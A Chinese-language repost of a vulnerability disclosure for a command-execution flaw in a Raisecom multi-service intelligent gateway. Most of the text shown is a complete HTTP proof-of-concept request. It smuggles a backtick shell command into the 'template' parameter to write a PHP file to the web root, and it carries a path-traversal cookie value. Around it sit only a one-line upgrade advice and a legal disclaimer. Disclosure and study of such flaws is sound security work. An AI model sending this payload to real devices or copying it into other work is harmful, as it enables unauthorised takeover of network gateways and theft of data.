文章总结： 本文披露瑞斯康达多业务智能网关存在任意命令执行漏洞。攻击者可利用exec函数执行系统命令，写入恶意PHP文件获取服务器权限。文章提供了资产测绘语法及复现POC，建议升级至最新版本修复以防止数据泄露或服务器被控。 综合评分： 85 文章分类： 漏洞POC,漏洞分析,WEB安全

05

—

漏洞复现

POC

GET&nbsp;/vpn/list_base_config.php?type=mod&parts=base_config&template=`echo -e '<?php phpinfo();unlink(__FILE__);?>'>/www/tmp/test123.php`HTTP/1.1Host:&nbsp;127.0.0.1User-Agent: Mozilla/5.0&nbsp;(Windows NT&nbsp;10.0; Win64; x64; rv:146.0) Gecko/20100101&nbsp;Firefox/146.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: think_var=..%2F..%2Fapplication%2Fdatabase; PHPSESSID=m0lgoj6m4hovmtisu1868cc8h5Upgrade-Insecure-Requests:&nbsp;1Priority: u=0, iPragma: no-cacheCache-Control: no-cache

在URL后面拼接路径/tmp/test123.phphttp://127.0.0.1/tmp/test123.php

06

—

修复建议

升级到最新版本

07

—

往期回顾

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：北风漏洞复现文库 安服仔 安服仔《瑞斯康达-多业务智能网关-任意命令执行漏洞 附POC》